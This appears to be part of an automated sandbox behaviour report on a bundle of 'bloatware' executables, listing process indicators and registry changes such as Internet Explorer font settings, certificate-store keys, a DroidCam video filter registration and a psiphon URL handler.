Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier C:\Windows\SysWOW64\xcopy.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\37\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\26 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEFixedFontName = "Estrangelo Edessa" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "282" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEPropFontName = "Shonar Bangla" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\3\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "282" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\18\IEFixedFontName = "Kartika" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\35\IEPropFontName = "Estrangelo Edessa" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\38\IEPropFontName = "MV Boli" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437219416" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\16\IEPropFontName = "Vani" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEPropFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\13\IEFixedFontName = "Shruti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEFixedFontName = "MingLiu" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\11\IEFixedFontName = "Shonar Bangla" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\8 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\36\IEPropFontName = "Myanmar Text" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\33\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\NumberOfSubdomains = "1" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\9\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\youtube.com\Total = "0" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34 C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\5\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEPropFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\39\IEFixedFontName = "Mongolian Baiti" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\6\IEPropFontName = "Times New Roman" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\DOMStorage\www.youtube.com\ = "10998" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30 C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\20\IEFixedFontName = "Leelawadee UI" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\23\IEFixedFontName = "GulimChe" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\25\IEPropFontName = "PMingLiu" C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\International\Scripts\28\IEPropFontName = "Gadugi" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7B65CF41-9DB2-11EF-AE37-6A7FEBC734DB} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\13 C:\Windows\SysWOW64\reg.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\system32\DrvInst.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\system32\DrvInst.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\ = "DroidCam Source 2" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FilterData = 02000000000060000100000000000000307069330800000000000000010000000000000000000000307479330000000038000000480000007669647300001000800000aa00389b7100000000000000000000000000000000 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\DevicePath = "droidcam:2" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\\bloatware\\3.exe\" -- \"%1\"" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter64.ax" C:\Windows\system32\regsvr32.exe N/A
